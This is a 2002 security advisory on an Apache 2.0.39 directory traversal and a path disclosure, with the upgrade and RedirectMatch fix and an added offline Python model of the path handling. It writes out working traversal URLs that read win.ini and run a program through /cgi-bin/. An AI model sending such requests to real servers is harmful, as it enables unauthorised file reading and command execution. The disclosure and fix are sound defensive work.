######################################################################

Luigi Auriemma

Application: Apache WebServer (http://httpd.apache.org)
Version:     2.0.39 and previous 2.0.x, ONLY on systems that support
             backslash path delimiters (Win/Netware/OS2 etc...)
Bug:         Directory traversal vulnerability and path disclosure.
             An attacker can view the path where the server is installed.
Date:        16 Aug 2002
Author:      Luigi Auriemma
e-mail:      aluigi@autistici.org
web:         aluigi.org

CAN-2002-0654
CAN-2002-0661

######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

######################################################################

===============
1) Introduction
===============

The directory traversal bug I have found can be classified as high risk
and the path disclosure as low risk.

With the first bug an attacker can read every file on the system and
execute programs on it through the /cgi-bin/ path. The bug was reported
to the Apache Group a few minutes after it was discovered, and it was
quickly fixed.

The second bug is a simple path disclosure, useful for obtaining more
information about the server (important if the administrator hides
information about it).

- IMPORTANT NOTE -

The ASF recommends that all Win32, Netware and OS2 users immediately
upgrade to 2.0.40 or, temporarily, apply the fix suggested in the Fix
section of this advisory. It is also suggested that the un*x flavors
consider upgrading to 2.0.40 as well, to eliminate the path-revealing
bugs, which apply to all versions.

######################################################################

======
2) Bug
======

A) CAN-2002-0654
================

This bug is not dangerous in itself, because it gives neither remote
access to the system nor access to other data, but it is useful to an
attacker for gathering detailed information about the server before
launching other attacks.
With this bug we can see the path where Apache is installed, so we learn
whether the server runs on a Windows machine, whether it is the second
version of Apache (Apache2) and naturally the server version. All of this
is useful if the administrator has obscured the Server header or other
information about the server: if the bug is present we know, for example,
that the installed Apache is a version prior to 2.0.40.

Let's go with the example. From the browser we request the following URL:

  http://SERVER/error/HTTP_NOT_FOUND.html.var

The server answers with this page:

  |Not Acceptable
  |
  |An appropriate representation of the requested resource
  |/error/HTTP_NOT_FOUND.html.var could not be found on this server.
  |Available variants:
  |
  | * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language de
  | * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language en
  | * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language es
  | * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language fr

As we can see, the server answers with the full filesystem path of the
file we requested. Requesting any of the other .var files in the error
folder gives the same result.

More detailed info can be found on the Apache website
http://httpd.apache.org

B) CAN-2002-0661
================

The problem is in the handling of the bad characters that can be used
to launch attacks such as directory traversal. The backslash character
('\' == %5c) is not checked as a bad character (it is not recognised as
a path delimiter when the request path is normalised), so it can be
used to walk the directories of systems that do use it as a path
delimiter (Windows, Netware, OS2 and others). A second consequence is
that the attacker can execute programs on the remote host simply by
using the /cgi-bin/ path.

The following are two simple examples.
To view the file winnt\win.ini:

  http://SERVER/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini

To run the wintty utility in the Apache2/bin folder:

  http://SERVER/cgi-bin/%5c%2e%2e%5cbin%5cwintty.exe?%2dt+HELLO

In human readable form, they mean:

  http://SERVER/error/\..\..\..\..\winnt\win.ini
  http://SERVER/cgi-bin/\..\bin\wintty.exe?-t+HELLO

So in the first example we go up to the root of the drive with
\..\..\..\..\ because we start in "c:\program files\Apache Group\Apache2\error".
In the second example we use the /cgi-bin/ path instead, and we pass
arguments to the program with "file.exe?arg1+arg2+arg3+...".

More detailed info can be found on the Apache website
http://httpd.apache.org

######################################################################

===========
3) The Code
===========

See the examples in section 2.

######################################################################

======
4) Fix
======

Apache 2.0.40 from the Apache website (http://httpd.apache.org)

However, this is a simple workaround suggested by the Apache Group for
the directory traversal bug:

---
A simple one line workaround in the httpd.conf file will disallow the
vulnerability. Prior to the first 'Alias' or 'Redirect' directive, add
the following directive to the global server configuration:

RedirectMatch 400 "\\\.\."
---

######################################################################
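The following Python script is an added example; it is not code from this advisory or from the Apache project, and it talks to no server. It models how httpd maps a request URI to a file on a platform with backslash path delimiters (the 2.0.39 behaviour next to the 2.0.40 behaviour) for the two URLs of section 2 B), checks the RedirectMatch workaround of section 4 against them, and parses the 406 page of section 2 A) to recover the disclosed install path. The install layout, the simplified normalisation and the sample 406 body are assumptions of the example.

```python
"""Model of the two Apache 2.0.39 issues in this advisory (added example).

Not code from the advisory or from the Apache project. It contacts no
server: it models how httpd maps a request URI to a file on a platform
with backslash path delimiters (2.0.39 next to 2.0.40), checks the
RedirectMatch workaround of section 4, and parses the 406 body of
section 2 A). The install layout below is assumed.
"""
import posixpath
import re
from urllib.parse import unquote

# Assumed install layout, matching the paths quoted in the 406 response.
SERVER_ROOT = "C:/server/Apache Group/Apache2"
DOCUMENT_ROOT = SERVER_ROOT + "/htdocs"
# URL prefix -> directory it is meant to expose (Alias / ScriptAlias).
ALIASES = {
    "/error/": SERVER_ROOT + "/error/",
    "/cgi-bin/": SERVER_ROOT + "/cgi-bin/",
}


def decode_uri(raw_uri):
    """Percent-decode the path of a request URI, dropping the query string."""
    return unquote(raw_uri.split("?", 1)[0])


def windows_resolve(path):
    """The file a backslash-delimited filesystem opens for a mixed path.

    Both '/' and '\\' separate components and '..' is collapsed, but never
    above the drive root. Returned with forward slashes, as in the 406 body.
    """
    drive, rest = path[:2], path[2:]
    return drive + posixpath.normpath(rest.replace("\\", "/"))


def inside(path, directory):
    """True if path is directory itself or lies beneath it."""
    directory = directory.rstrip("/")
    return path == directory or path.startswith(directory + "/")


def resolve_request(raw_uri, fixed):
    """Map a request URI to (file the OS would open, escaped?).

    fixed=False models 2.0.39: only '/' counts as a delimiter while '..'
    segments are collapsed, so a '\\..\\' run survives normalisation and
    reaches the filesystem intact. fixed=True models 2.0.40, where '\\'
    is treated as a delimiter on these platforms before normalising.
    """
    uri = decode_uri(raw_uri)
    if fixed:
        uri = uri.replace("\\", "/")
    uri = posixpath.normpath(uri)  # collapses '/../' like ap_getparents()
    for prefix, target in ALIASES.items():
        if uri.startswith(prefix):
            base, path = target, target + uri[len(prefix):]
            break
    else:
        base, path = DOCUMENT_ROOT, DOCUMENT_ROOT + uri
    opened = windows_resolve(path)
    return opened, not inside(opened, base)


# Section 4 workaround: RedirectMatch 400 "\\\.\."  The config reader
# collapses '\\' to '\' inside the quoted argument, leaving mod_alias the
# pattern below (literal backslash, any character, literal dot). It is
# matched against the already percent-decoded path, so %5c%2e%2e is
# caught just like a bare \.. sequence.
WORKAROUND = re.compile(r"\\.\.")


def workaround_blocks(raw_uri):
    """True if the RedirectMatch rule would answer this request with 400."""
    return WORKAROUND.search(decode_uri(raw_uri)) is not None


# Section 2 A): each line of the 406 page names a variant with its full
# filesystem path. Constructed here from the advisory's sample response.
SAMPLE_406 = """Not Acceptable

An appropriate representation of the requested resource
/error/HTTP_NOT_FOUND.html.var could not be found on this server.
Available variants:

 * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language de
 * C:/server/Apache Group/Apache2/error/HTTP_NOT_FOUND.html.var , type text/html, language en
"""
VARIANT_LINE = re.compile(
    r"^\s*\*\s+(?P<path>.+?)\s*,\s*type\s+(?P<type>\S+),\s*language\s+(?P<lang>\S+)"
)


def disclosed_paths(body):
    """Distinct filesystem paths listed in an 'Available variants' body."""
    hits = (VARIANT_LINE.match(line) for line in body.splitlines())
    return sorted({m.group("path") for m in hits if m})


def install_root(variant_path):
    """Cut a disclosed .var path back to the server root (before /error/)."""
    head, sep, _ = variant_path.partition("/error/")
    return head if sep else None


if __name__ == "__main__":
    for url in ("/error/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini",
                "/cgi-bin/%5c%2e%2e%5cbin%5cwintty.exe?%2dt+HELLO",
                "/error/HTTP_NOT_FOUND.html.var"):
        for label, fixed in (("2.0.39", False), ("2.0.40", True)):
            print(label, url, "->", resolve_request(url, fixed))
        print("  RedirectMatch 400 blocks it:", workaround_blocks(url))
    for p in disclosed_paths(SAMPLE_406):
        print("disclosed:", p, "-> server root", install_root(p))
```

Run as a script it prints each URL resolved both ways: under the 2.0.39 model the win.ini request lands on C:/winnt/win.ini and the wintty request on Apache2/bin/wintty.exe, outside the /error/ and /cgi-bin/ directories, while under the 2.0.40 model the same requests collapse to harmless paths under the DocumentRoot. Two caveats on the workaround: both readings of the quoted pattern (the collapsed "\\.\." used here and the stricter "\\\.\.") match the "\.." sequence, so the outcome of the check is the same either way, and the rule rejects any path containing such a sequence with a 400, whether or not it would have escaped. It covers only the traversal; the path disclosure of section 2 A) is fixed by upgrading to 2.0.40.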